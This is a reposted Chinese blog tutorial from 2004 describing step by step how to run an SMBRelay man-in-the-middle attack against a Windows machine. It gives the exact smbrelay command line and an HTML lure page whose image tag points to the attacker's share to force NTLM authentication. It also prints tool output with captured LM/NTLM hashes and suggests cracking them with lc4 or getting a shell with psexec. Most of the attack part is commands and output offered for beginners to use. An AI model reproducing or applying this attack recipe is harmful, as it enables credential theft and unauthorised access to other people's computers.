使用smbrelay进行中间人攻击

最新推荐文章于 2024-01-16 16:44:51 发布
最新推荐文章于 2024-01-16 16:44:51 发布
阅读量1.2k 收藏
点赞数
分类专栏: 计算机安全 文章标签: session windows interface 测试 网络 c
使用smbrelay进行中间人攻击
Submitted by 云舒 on 2004, July 7, 3:16 PM. 技术


最近使用smbrelay进行攻击很流行,我也赶时髦测试了一下,感谢xx2同志提高肉鸡,确实是个好同志呀。在这里,我就不写理论知识了,仅仅简单描述我的步骤,使比我还菜的鸟也能够一见中间人攻击的庐山真面目,现在简述如下:

1.虽然使用smbrelay攻击只需要2台机子,一台受害者A,一台攻击者B,但是却需要3个IP地址进行攻击。所以,要在控制面版中间再填加 一个ip地址C,IP地址C要和IP地址B在同个网段。为了避免IP地址冲突,要选择一个没有使用的IP地址。我是使用superscan扫描整个C类地 址,只ping就可以了。在这里,我的IP地址,也就是攻击者为XXX.92.45.18,虚拟的IP地址为XXX.92.45.19,受害者,也就是 xx2同志的IP地址是YYY.93.113.203。为了避免不必要的麻烦,我把IP地址都做了处理,这样,你好我也好!!:)

2.然后,使用smbrelay /E列举网卡,这里为1000004,然后输入C:/WINNT/system32/system/tools>smbrelay /D 1 /IL 1000004 /IR 1000004 /L+ XXX.92.45.19 /R- XXX.92.45.19,其中/D为纠错等级,我这样翻译它吧,英语烂。默认是0,我用的1,中庸之道。/IL和/IR都是写网卡编号。/L+和/R- 是那个虚拟的ip地址c。显示如下:

C:/WINNT/system32/system/tools>smbrelay /D 1 /IL 1000004 /IR 1000004 /L+ XXX.92.45.19 /R- XXX.92.45.19

SMBRelay v0.981 - TCP (NetBT) level SMB man-in-the-middle relay attack

Copyright 2001: Sir Dystic, Cult of the Dead Cow

Send complaints, ideas and donations to sirdystic@cultdeadcow.com

Using local adapter index 1000004: Intel(R) PRO Adapter

Error 52 adding IP address to interface 1000004: 网络上已有重复的名称

3.作好一个烂网页,代码如下:

< html>

< head>

< title>hash

< /head>

< body>

< img src="file://XXX.92.45.19/c$/hash.jpg">

< /body>

< /html>

其中XXX.92.45.19为你的虚拟ip。现在等受害者来访问它了,你就可以抓到它的LM hash和NTLM hash了,然后用lc4破解。其实这个页面你可以做的更好,让别人看不出来,这里我仅仅测试,就不用伪装了。听别人说可以直接net use:/XXX.92.45.19,还可以用psexec获得SHELL,我没有psexec,没有测试。

但是测试net use的时候显示:

C:/>net use /XXX.92.45.19
系统发生67错误

找不到网络路径

我也不知道为什么,哎……技术太菜了。抓的hash会以txt格式保存在smbrelay的目录里面。我得到的屏幕显示如下:

C:/WINNT/system32/system/tools>smbrelay /D 1 /IL 1000004 /IR 1000004 /L+ XXX.92.45.19 /R- XXX.92.45.19

SMBRelay v0.981 - TCP (NetBT) level SMB man-in-the-middle relay attack

Copyright 2001: Sir Dystic, Cult of the Dead Cow

Send complaints, ideas and donations to sirdystic@cultdeadcow.com

Using local adapter index 1000004: Intel(R) PRO Adapter

Error 52 adding IP address to interface 1000004: 网络上已有重复的名称

Bound to port 139 on address XXX.92.45.19

Connection from YYY.93.113.203:2510

Request type: Session Request 72 bytes

Source name: JIANHUFENG <00>

Target name: *SMBSERVER <20>

Setting target name to source name and source name to 'CDC4EVER'...

Response: Positive Session Response 4 bytes

Request type: Session Message 137 bytes

SMB_COM_NEGOTIATE

Response: Session Message 123 bytes

Challenge (8 bytes): 726C02A8799402E7

Request type: Session Message 200 bytes

SMB_COM_SESSION_SETUP_ANDX

Password lengths: 1 0

Username: ""

Domain: ""

OS: ""

Lanman type: ""

???: ""

Response: Session Message 154 bytes

OS: "Windows 5.0"

Lanman type: "Windows 2000 LAN Manager"

Domain: "WORKGROUP"

Request type: Session Message 108 bytes

SMB_COM_TRANSACTION2

Response: Session Message 39 bytes

Request type: Session Message 274 bytes

SMB_COM_SESSION_SETUP_ANDX

Password lengths: 24 24

Case insensitive password:

780FAB7048A77950377C354428046698E94D34857E359CC3

Case sensitive password:

F3AD285B79DACDB857763ED78FA71B4CE0E4CE83C413D4FF

Username: "Guest"

Domain: "JIANHUFENG"

OS: "Windows 2000 2195"

Lanman type: "Windows 2000 5.0"

???: ""

Response: Session Message 154 bytes

OS: "Windows 5.0"

Lanman type: "Windows 2000 LAN Manager"

Domain: "WORKGROUP"

Password hash written to disk

Connected?

Bound to port 139 on address XXX.92.45.19 relaying for host

JIANHUFENG YYY.93.113.203

PS:我写这个文章的目的是因为有的人会这个,但是他们认为菜鸟不应该掌握这个,我很不爽,呵呵。本文参考了我们幻影的ciel的文章,它的文章发表在安全焦点http://www.xfocus.net/articles/200305/538.html ,大家可以去看看,他讲了很多理论知识的哦……

好了,我是灰色轨迹的云舒,欢迎大家转载,但是请保留出处,谢谢了。灰色轨迹地址http://www.isgrey.com ,我的邮箱wustyunshu@hotmail.com
lionzl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kerberos域安全系列(29) NTLM中间人攻击
prettyX的博客
05-19 712
NTLM中间人攻击 NTLM Relay中间人攻击或重放攻击是一个意思 2001年,最早由Dystic实现,SMBRelay 2004年,发展为HTTP->SMB,BlackHat,未开源 2007年,HTTP->SMB被集成到MetaSploit 2008年,HTTP->HTTP的NTLM攻击被实现(MS08-067) NTLM认证过程 NTLM中间人实验 1、工具 ntlmrelayx.py ,安装命令 pip install ldap3 dnspytho
攻击linux的samba,Samba 中间人攻击漏洞(CVE-2015-5296)
weixin_33608760的博客
05-17 266
Samba 中间人攻击漏洞(CVE-2015-5296)发布日期:2015-12-19更新日期:2016-01-01受影响系统:Samba Samba 4.x-4.1.22Samba Samba 4.3.x-4.3.3Samba Samba 4.2.x-4.2.7Samba Samba 3.x描述:CVE(CAN) ID: CVE-2015-5296Samba是在Linux和UNIX系统上实现SM...
smb中继攻击
weixin_38168081的博客
07-31 763
一.NTLM hash 和 Net-NTLM hash 1.客户端向服务器发送一个请求,请求中包含明文的登录用户名。服务器会提前保存登录用户名和对应的密码 hash 2.服务器接收到请求后,生成一个 16 位的随机数 (被称为 Challenge也就是挑战码), 使用存储的登录用户密码 hash 加密 Challenge,获得 Challenge1,将challenge发送给客户端 ...
NTLM/smb 中继攻击
灰太的表格的博客
10-19 1218
NTLM/smb 中继攻击
smbrelay3.exe +源码 虚拟机内此时,可能报病毒
08-09
5. **smbrelay**:这是工具的名称,专门针对SMB协议进行中间人攻击。 压缩包内的文件名称列表提供了进一步的信息: 1. **libeay32.dll**:这是一个OpenSSL库文件,用于加密和安全通信,可能被smbrelay3工具用到。 ...
SmbRelay程序
07-07
SMBRelay是针对SMB协议的一种攻击技术,它利用了SMB协议的某些特性,特别是不安全的身份验证机制,来实施中间人(Man-in-the-Middle, MITM)攻击。中间人攻击是指攻击者在通信双方之间插入自己,截取、篡改或伪造...
记一份SQLmap 使用手册小结(二)1
08-03
这篇小结主要关注SQLmap的高级功能,包括自定义函数注入、系统文件操作、文件读写、执行操作系统命令以及利用Meterpreter进行进一步的攻击。 1. **自定义函数注入**: SQLmap允许用户在MySQL和PostgreSQL中注入...
Oracle 低权限数据库账户得到 OS 访问权限 提权利用
12-16
感觉挺有意思的,文档的 大概意思就是说,如果 ORACLE 服务是用 administrator 账户启动的,你只要有一个具有 resource 和 connect 权限的数据库账户,就能利用 metasploit 的 smbrelay 功能,本地搭建一个 SMB 欺骗...
RFID安全之——ID门禁卡攻击
龙冈上面的小欧德敏
04-08 3274
物联网发展如火如荼,给生活带来便利的同时也悄悄的留下了不少安全隐患。刚看了碟中谍4里面很多炫酷的高科技技术让人难以忘记,其中经常看到的莫过于特工们进入任何一个房间,都可用一款特殊设备来打开门禁。电影终归电影,那在现实生活中会不会发生这样的事情呢?   首先,通过一段时间的研究,我们发现基于RFID技术的门禁系统确实存在着一些安全隐患,攻击门禁的方法基本如下几种:   嗅探通讯数据   模拟门
SMB relay解密使用python进行ntlmv2攻击
iteye_16188的博客
11-18 438
原文地址:[url]http://pen-testing.sans.org/blog/pen-testing/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python[/url] SMB Relay拥有稳定,可靠,有效的特点。即使组织都及时安装补丁,SMB Relay仍然可以帮助你访问到关键资产。大多数组织都有一些自动化的系统来...
读取文件内容本地可以服务器不行_任意文件读取到SMB Relay
weixin_34928522的博客
01-27 214
NTML 认证过程NTML认证分三个步骤如下:1.协商(NTLMSSP_NEGOTIATE)客户端向服务器发送请求,其中包含客户端支持和服务器请求的功能列表,和一些版本信息。2.质询(NTMLSSP_CHALLENGE)服务器以自己的消息作为响应,其中包含服务器产生的Challenge(挑战)值。3.响应(NTMLSSP_AUTH)收到challenge后客户端使用用户hash将chal...
SmbRelay3 – SMB/HTTP to SMB replay attacks
cnbird's blog
10-09 1226
 Server Message Block normally provides shared access to files, printers, serial ports, and miscellaneous communications between nodes on a Windows network. So, you know how important it is! At the
内网渗透----常见后门
浅笑996的博客
05-31 1213
0x01.综合利用手法 1.Smbrelay smbrelayx.py 由于此手法是中间件攻击,需要关闭SMB的签名措施,Windows Server默认开启,其他系统默认关闭,使用 nmap扫描一下未开启签名的机器: nmap -sT -p 445 --open --script smb-security-mode.nse,smb-os-discovery.nse 192.168.91.0/24...
内网渗透测试:NTLM Relay攻击分析
whatday的专栏
07-31 6564
目录 基础知识 NTLM认证过程 NTLM中继攻击原理 获得Net-NTLM Relay的思路 利用LLMNR和NetBIOS欺骗获得Net-NTLMHash 利用WPAD劫持获得Net-NTLMHash SMB RelaySMB中继)攻击 攻击演示 Responder中的MultiRelayx.py Impacket中的smbrelayx.py Metasploit中的smb_relay模块(ms08-068) Impcaket中的ntlmrelayx.py Ending...
实战CVE-2015-0005
最新发布
Ms08067安全实验室
01-16 802
点击星标,即时接收最新推文CVE-2015-0005启用SMB签名和通信会话签名后,应用服务器和客户端之间的所有流量都有签名验证保护,中间人攻击者因为无法伪造签名而不能与目标主机进行正常的通信。签名密钥SessionKey基于客户端账号的口令NTLM值生成,应用服务器在认证阶段从认证服务器获取;客户端采用和认证服务器相同的算法,基于自身口令的NTLM值生成会话密钥。由于SessionKey不需要交...
ESP8266加LED做一个闪光灯
weixin_45442198的博客
06-25 2367
代码如下(示例):/* 文件名称:blink.ino 功能:ESP8266闪灯示例*/ #define PIN_LED 5 //5是端口D1 #define KEY_FLASH 13void setup() { //设置PINLED为输出模式 pinMode(PIN_LED, OUTPUT); //初始关闭LED灯 di
漏洞扫描技术实验(Nessus)
Beeters的博客
11-12 2259
Nessus漏洞扫描技术
内网渗透测试:内网横向移动基础总结
zhangge3663的博客
10-27 4569
作者:WHOAMI,转载于freebuf。 横向移动 在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。 在这篇文章中,我们来 讲解一下横向移动的思路与攻击手法。 由于最近开学了有很多很多的事,所以一直没有时间更新,文章可能略显仓促,不足之处还请多多指教。 本文大多是我最近

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值